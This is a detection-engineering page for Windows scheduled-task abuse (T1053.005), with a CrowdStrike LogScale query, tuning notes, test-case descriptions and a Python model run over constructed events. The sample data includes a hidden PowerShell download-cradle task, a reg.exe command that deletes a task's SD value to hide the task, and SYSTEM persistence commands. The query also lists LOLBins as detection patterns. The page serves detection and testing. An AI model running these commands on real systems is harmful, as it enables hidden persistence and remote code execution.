Detect Scheduled Task in CrowdStrike LogScale
Adversaries may abuse the Windows Task Scheduler to schedule initial or recurring execution of malicious code. Tasks are created, modified or deleted through schtasks.exe, the Task Scheduler GUI, the COM/.NET API, WMI/CIM (the legacy Win32_ScheduledJob class for AT jobs, or PS_ScheduledTask behind the ScheduledTasks PowerShell module), or by writing to the TaskCache registry keys directly. A task can be registered to run under any account context, including SYSTEM, so an attacker who already holds local administrator rights commonly uses one to step up to SYSTEM. Adversaries also hide tasks by deleting the task's Security Descriptor (SD) registry value under TaskCache\Tree, which makes the task invisible to schtasks /query and the Task Scheduler UI while it keeps running.
MITRE ATT&CK
- Technique: T1053 Scheduled Task/Job
- Sub-technique: T1053.005 Scheduled Task
- Canonical reference: https://attack.mitre.org/techniques/T1053/005/
LogScale Detection Query
// Scope: schtasks.exe process creations plus registry activity under the TaskCache key.
// LogScale cannot OR whole pipelines together, so the three branches live in one case{} block:
// an event goes to the first branch it survives, and events matching no branch are dropped.
(#event_simpleName=ProcessRollup2 FileName=/^schtasks\.exe$/i)
OR ((#event_simpleName=RegGenericValueUpdate OR #event_simpleName=RegKeyCreate)
    RegObjectName=/\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\/i)
| case {
    // Branch 1: schtasks.exe /create or /change with suspicious arguments or parent process
    #event_simpleName=ProcessRollup2 CommandLine=/\/(create|change)\b/i
    | HasSuspiciousLoc := if(CommandLine=/\\AppData\\|\\Temp\\|\\ProgramData\\|\\Public\\|%temp%|%appdata%|%public%/i, then=1, else=0)
    | HasSuspiciousBin := if(CommandLine=/(cmd|powershell|pwsh|wscript|cscript|mshta|rundll32|regsvr32|certutil|bitsadmin|msbuild|wmic|msiexec)\.exe/i, then=1, else=0)
    // /ru SYSTEM, "SYSTEM" or "NT AUTHORITY\SYSTEM", quoted or not
    | RunAsSystem := if(CommandLine=/\/ru\s+"?(nt authority\\)?system"?/i, then=1, else=0)
    | RemoteTask := if(CommandLine=/\/s\s+\S+/i, then=1, else=0)
    // schtasks has no "onstartup" schedule; the boot trigger is /sc onstart
    | OnLogonTrigger := if(CommandLine=/\/sc\s+(onlogon|onstart)\b/i, then=1, else=0)
    | HighFreqTrigger := if(CommandLine=/\/sc\s+(minute|hourly)\b/i, then=1, else=0)
    | SuspiciousParent := if(ParentBaseFileName=/^(powershell|pwsh|cmd|wscript|cscript|mshta|rundll32|regsvr32|msiexec|wmic|winword|excel|outlook|acrord32|msedge|chrome|firefox)\.exe$/i, then=2, else=0)
    | SuspicionScore := HasSuspiciousLoc + HasSuspiciousBin + RunAsSystem + RemoteTask + OnLogonTrigger + HighFreqTrigger + SuspiciousParent
    | DetectionBranch := "schtasks_suspicious_args_or_parent";
    // Branch 2: any other schtasks.exe operation (query, delete, run, end) from a script host, Office application or browser.
    // Events carrying /create or /change never reach this branch because Branch 1 has already claimed them.
    #event_simpleName=ProcessRollup2 ParentBaseFileName=/^(powershell|pwsh|wscript|cscript|mshta|rundll32|regsvr32|winword|excel|outlook|acrord32|msedge|chrome|firefox)\.exe$/i
    | SuspicionScore := 2
    | DetectionBranch := "schtasks_suspicious_parent_any_operation";
    // Branch 3: TaskCache registry writes by a process other than the Task Scheduler service.
    // Falcon registry events carry ContextProcessId rather than an image name, so the writing process is
    // resolved by joining to the ProcessRollup2 event with the same aid and TargetProcessId (inner join:
    // registry events whose process creation is outside the search window are dropped).
    #event_simpleName=RegGenericValueUpdate OR #event_simpleName=RegKeyCreate
    | join({#event_simpleName=ProcessRollup2}, field=[aid, ContextProcessId], key=[aid, TargetProcessId], include=[ImageFileName, CommandLine, UserName])
    | NOT ImageFileName=/\\(svchost|taskeng|taskhostw)\.exe$/i
    | SuspicionScore := 1
    | DetectionBranch := "registry_taskcache_write";
  }
| SuspicionScore > 0
| table([@timestamp, ComputerName, UserName, FileName, ImageFileName, CommandLine, ParentBaseFileName, ParentCommandLine,
        RegObjectName, RegValueName, HasSuspiciousLoc, HasSuspiciousBin, RunAsSystem, RemoteTask, OnLogonTrigger,
        HighFreqTrigger, SuspiciousParent, SuspicionScore, DetectionBranch])
| sort([SuspicionScore, @timestamp], order=desc)
Detects Windows Scheduled Task abuse (T1053.005) across three detection branches using CrowdStrike Falcon telemetry. Branch 1 matches schtasks.exe process-creation events carrying /create or /change and scores them against a set of indicators: a LOLBin as the task action, a user-writable or staging path, a SYSTEM run-as context, remote task creation (/s), a logon or boot trigger, a high-frequency schedule, and a script-host, Office or browser parent process. Branch 2 catches any other schtasks.exe invocation (query, delete, run, end) whose parent is an Office application, browser or script interpreter, which rarely happens outside document-based or LOLBin abuse. Branch 3 flags registry writes under the TaskCache key by a process other than the Task Scheduler service. Keep in mind that tasks registered through schtasks.exe, the Task Scheduler API or the ScheduledTasks PowerShell module are written to TaskCache by the Schedule service itself (svchost.exe), so Branch 3 fires only on direct registry manipulation, such as deleting a task's SD value to hide it or writing a task blob by hand; registration via the API without schtasks.exe is not covered by this query and relies on Security Event ID 4698. Before deploying, confirm that the sensor in your tenant emits RegGenericValueUpdate events for the TaskCache keys, since the Falcon sensor only reports registry activity for a curated set of paths.
Data Sources
Required Tables
False Positives & Tuning
- Legitimate enterprise deployment tools (SCCM, Intune, PDQ Deploy) that invoke schtasks.exe from administrative scripts running under PowerShell or cmd.exe to provision application maintenance tasks on managed endpoints.
- Software installation processes for productivity suites (Microsoft Office, Adobe Acrobat) that may spawn schtasks.exe to register update schedulers in AppData or ProgramData paths during initial installation.
- Security tools and EDR agents that write directly to the Task Scheduler registry keys as part of self-protection, persistence, or scheduled scan configuration mechanisms.
- Developer tooling on workstation endpoints where build systems, test runners, or local automation scripts use schtasks.exe to configure scheduled jobs for background tasks in development environments.
Other platforms for T1053.005
Testing Methodology
Validate this detection against five test cases modelled on the Atomic Red Team atomics for T1053.005. Each test below lists the behaviour to exercise and the telemetry you should expect to see; Security Event ID 4698 appears only when the "Audit Other Object Access Events" subcategory is enabled. Executable commands and cleanup steps are available with Pro.
- Test 1: Create Persistence Scheduled Task Running as SYSTEM
Expected signal: Sysmon Event ID 1: Process Create with Image=schtasks.exe and a CommandLine containing '/create', '/tn WindowsSystemCheck', '/ru SYSTEM', '/sc onstart'. Security Event ID 4688 (if command line auditing is enabled). Security Event ID 4698 (Scheduled Task Created) in the Security log with task XML showing the SYSTEM principal. Registry key created under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\ (ONSTART trigger). Branch 1 scores this on RunAsSystem, OnLogonTrigger and, when launched from a shell, SuspiciousParent.
- Test 2: Scheduled Task with PowerShell Download Cradle Action
Expected signal: Sysmon Event ID 1: schtasks.exe with the full command line including the PowerShell cradle. Security Event ID 4698 with task XML showing a PowerShell action with a hidden window and the download cradle. Task XML file written to C:\Windows\System32\Tasks\MicrosoftEdgeUpdateCheck. Registry entries created under TaskCache\Logon\. Branch 1 scores this on HasSuspiciousBin and OnLogonTrigger.
- Test 3: Scheduled Task Created via PowerShell (Invoke-CimMethod)
Expected signal: Sysmon Event ID 1: powershell.exe process with a command line containing Register-ScheduledTask or Invoke-CimMethod against the PS_ScheduledTask CIM class, and no schtasks.exe child process. Security Event ID 4698: Scheduled Task Created (WmiTaskTest). Sysmon Event ID 13: registry value written under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\ by svchost.exe hosting the Schedule service, which performs the write on the caller's behalf; powershell.exe does not touch the registry itself. Task XML file written to C:\Windows\System32\Tasks\WmiTaskTest. Because no schtasks.exe runs and the registry writer is the Schedule service, none of the three branches above fires on this test; coverage here comes from 4698 or from a PowerShell-focused rule.
- Test 4: Hidden Scheduled Task via SD Registry Value Deletion
Expected signal: Sysmon Event ID 1: schtasks.exe creating the task. Sysmon Event ID 12 (Registry object deleted): TargetObject = HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\HiddenPersistTask\SD, Image = reg.exe. Security Event ID 4698: task created. After the SD deletion the task is absent from schtasks /query and the Task Scheduler UI but still runs from TaskCache. The reg.exe write to TaskCache is exactly what Branch 3 is built to catch, since the writer is not the Schedule service.
- Test 5: Remote Scheduled Task Creation for Lateral Movement
Expected signal: Sysmon Event ID 1: schtasks.exe with a CommandLine containing '/s 127.0.0.1', '/ru SYSTEM', '/create'. Security Event ID 4698: Scheduled Task Created on the target (here local) system. Network connection to the local Task Scheduler RPC endpoint (TCP 135 endpoint mapper, then a dynamic RPC port). Security Event ID 4648 (logon with explicit credentials) if /u and /p supply alternate credentials. Branch 1 scores this on RemoteTask and RunAsSystem.
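The three branches of the query above and the telemetry listed for the five tests, as an added example that is not the page's own code and not part of CrowdStrike's tooling: a small Python model of the scoring and branch logic run over constructed Falcon-style events. The hostnames, process IDs, task GUID and command lines are made up to follow the test list; the dict keys approximate Falcon field names; and both the registry-to-process join on aid plus ContextProcessId/TargetProcessId and the use of a generic value-update event to stand in for the SD deletion are assumptions. It shows which test lands in which branch with which score, and that Test 3 produces no alert because the Schedule service, not powershell.exe, performs the registry write.

```python
import re

# Indicator regexes mirroring the LogScale query (added example, not the page's or CrowdStrike's code).
CREATE_OR_CHANGE = re.compile(r"/(create|change)\b", re.I)
SUSPICIOUS_LOC = re.compile(r"\\AppData\\|\\Temp\\|\\ProgramData\\|\\Public\\|%temp%|%appdata%|%public%", re.I)
SUSPICIOUS_BIN = re.compile(r"(cmd|powershell|pwsh|wscript|cscript|mshta|rundll32|regsvr32|certutil|bitsadmin|msbuild|wmic|msiexec)\.exe", re.I)
RUN_AS_SYSTEM = re.compile(r'/ru\s+"?(nt authority\\)?system"?', re.I)
REMOTE_TASK = re.compile(r"/s\s+\S+", re.I)
LOGON_TRIGGER = re.compile(r"/sc\s+(onlogon|onstart)\b", re.I)
HIGH_FREQ_TRIGGER = re.compile(r"/sc\s+(minute|hourly)\b", re.I)
PARENT_B1 = re.compile(r"^(powershell|pwsh|cmd|wscript|cscript|mshta|rundll32|regsvr32|msiexec|wmic|winword|excel|outlook|acrord32|msedge|chrome|firefox)\.exe$", re.I)
PARENT_B2 = re.compile(r"^(powershell|pwsh|wscript|cscript|mshta|rundll32|regsvr32|winword|excel|outlook|acrord32|msedge|chrome|firefox)\.exe$", re.I)
TASKCACHE = re.compile(r"\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\", re.I)
SCHEDULER_SERVICE = re.compile(r"\\(svchost|taskeng|taskhostw)\.exe$", re.I)


def branch1_flags(command_line, parent):
    """Branch 1 indicator flags for a schtasks.exe /create or /change command line."""
    return {
        "HasSuspiciousLoc": int(bool(SUSPICIOUS_LOC.search(command_line))),
        "HasSuspiciousBin": int(bool(SUSPICIOUS_BIN.search(command_line))),
        "RunAsSystem": int(bool(RUN_AS_SYSTEM.search(command_line))),
        "RemoteTask": int(bool(REMOTE_TASK.search(command_line))),
        "OnLogonTrigger": int(bool(LOGON_TRIGGER.search(command_line))),
        "HighFreqTrigger": int(bool(HIGH_FREQ_TRIGGER.search(command_line))),
        "SuspiciousParent": 2 if PARENT_B1.match(parent) else 0,
    }


def evaluate(events):
    """Apply the three branches in the query's case{} order; return alerts sorted like the query."""
    # Branch 3 needs the writing process: registry events carry ContextProcessId, which is joined
    # (assumption: same aid) to the ProcessRollup2 event with that TargetProcessId.
    procs = {(e["aid"], e["TargetProcessId"]): e for e in events if e["event"] == "ProcessRollup2"}
    alerts = []
    for e in events:
        if e["event"] == "ProcessRollup2" and e["FileName"].lower() == "schtasks.exe":
            if CREATE_OR_CHANGE.search(e["CommandLine"]):
                flags = branch1_flags(e["CommandLine"], e["ParentBaseFileName"])
                score, branch = sum(flags.values()), "schtasks_suspicious_args_or_parent"
            elif PARENT_B2.match(e["ParentBaseFileName"]):
                flags, score, branch = {}, 2, "schtasks_suspicious_parent_any_operation"
            else:
                continue  # e.g. schtasks /query from explorer.exe: no indicator
            detail = e["CommandLine"]
        elif e["event"] in ("RegGenericValueUpdate", "RegKeyCreate") and TASKCACHE.search(e["RegObjectName"]):
            writer = procs.get((e["aid"], e["ContextProcessId"]))
            if writer is None or SCHEDULER_SERVICE.search(writer["ImageFileName"]):
                continue  # written by the Schedule service itself (or writer unknown): expected, not alerted
            flags, score, branch = {}, 1, "registry_taskcache_write"
            detail = writer["ImageFileName"] + " -> " + e["RegObjectName"] + "\\" + e["RegValueName"]
        else:
            continue
        if score > 0:
            alerts.append({"ts": e["ts"], "host": e["ComputerName"], "branch": branch,
                           "score": score, "detail": detail, **flags})
    return sorted(alerts, key=lambda a: (-a["score"], -a["ts"]))


def proc(ts, host, pid, image, cmd, parent):
    """Constructed ProcessRollup2-style event (sample data, not real telemetry)."""
    return {"event": "ProcessRollup2", "ts": ts, "aid": "aid-1", "ComputerName": host,
            "TargetProcessId": pid, "ImageFileName": image, "FileName": image.rsplit("\\", 1)[-1],
            "CommandLine": cmd, "ParentBaseFileName": parent}


def reg(ts, host, pid, key, value):
    """Constructed RegGenericValueUpdate-style event attributed to process `pid`."""
    return {"event": "RegGenericValueUpdate", "ts": ts, "aid": "aid-1", "ComputerName": host,
            "ContextProcessId": pid, "RegObjectName": key, "RegValueName": value}


TASKCACHE_KEY = r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache"
SAMPLE_EVENTS = [  # constructed to follow Tests 1-5 above, plus a benign query and a Branch 2 case
    proc(1, "WS01", 100, r"C:\Windows\System32\schtasks.exe",
         r'schtasks.exe /create /tn WindowsSystemCheck /tr "cmd.exe /c C:\Windows\Temp\check.bat" /ru SYSTEM /sc onstart /f', "cmd.exe"),
    proc(2, "WS01", 101, r"C:\Windows\System32\schtasks.exe",
         "schtasks.exe /create /tn MicrosoftEdgeUpdateCheck /sc onlogon /tr \"powershell.exe -w hidden -c IEX((New-Object Net.WebClient).DownloadString('http://example.invalid/u.ps1'))\"", "powershell.exe"),
    # Test 3: registered through the Schedule service; the TaskCache write comes from svchost.exe, so nothing fires
    proc(3, "WS01", 102, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         "powershell.exe -c Register-ScheduledTask -TaskName WmiTaskTest -Action $a -Trigger $t", "explorer.exe"),
    proc(0, "WS01", 900, r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs -p -s Schedule", "services.exe"),
    reg(3, "WS01", 900, TASKCACHE_KEY + r"\Tasks\{0000aaaa-0000-0000-0000-00000000aaaa}", "Path"),
    # Test 4: SD value removed with reg.exe (modelled as a value update; the real sensor event type is an assumption)
    proc(4, "WS01", 1200, r"C:\Windows\System32\reg.exe",
         r'reg.exe delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\HiddenPersistTask" /v SD /f', "cmd.exe"),
    reg(4, "WS01", 1200, TASKCACHE_KEY + r"\Tree\HiddenPersistTask", "SD"),
    proc(5, "WS01", 103, r"C:\Windows\System32\schtasks.exe",
         r'schtasks.exe /create /s 127.0.0.1 /tn RemoteExec /tr "cmd.exe /c whoami" /ru SYSTEM /sc once /st 23:59', "cmd.exe"),
    proc(6, "WS01", 104, r"C:\Windows\System32\schtasks.exe", "schtasks.exe /query /tn WindowsSystemCheck", "explorer.exe"),
    proc(7, "WS01", 105, r"C:\Windows\System32\schtasks.exe", "schtasks.exe /delete /tn Updater /f", "winword.exe"),
]

if __name__ == "__main__":
    for a in evaluate(SAMPLE_EVENTS):
        print(a["score"], a["branch"], a["detail"])
```

Running it prints five alerts in the query's order: Test 1 (score 6), Test 5 (5), Test 2 (4), the Word-spawned delete (2) and the reg.exe SD write (1); the Test 3 events and the benign query produce nothing, which is the coverage gap to close with a 4698-based or PowerShell-focused rule.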
References (11)
- https://attack.mitre.org/techniques/T1053/005/
- https://www.microsoft.com/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/
- https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments/
- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
- https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
- https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-object-access-events
- https://technet.microsoft.com/library/dd315590.aspx
- https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns
- https://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain
- https://learn.microsoft.com/en-us/windows/win32/taskschd/task-scheduler-start-page
- https://social.technet.microsoft.com/Forums/en-US/e5bca729-52e7-4fcb-ba12-3225c564674c/scheduled-tasks-history-retention-settings?forum=winserver8gen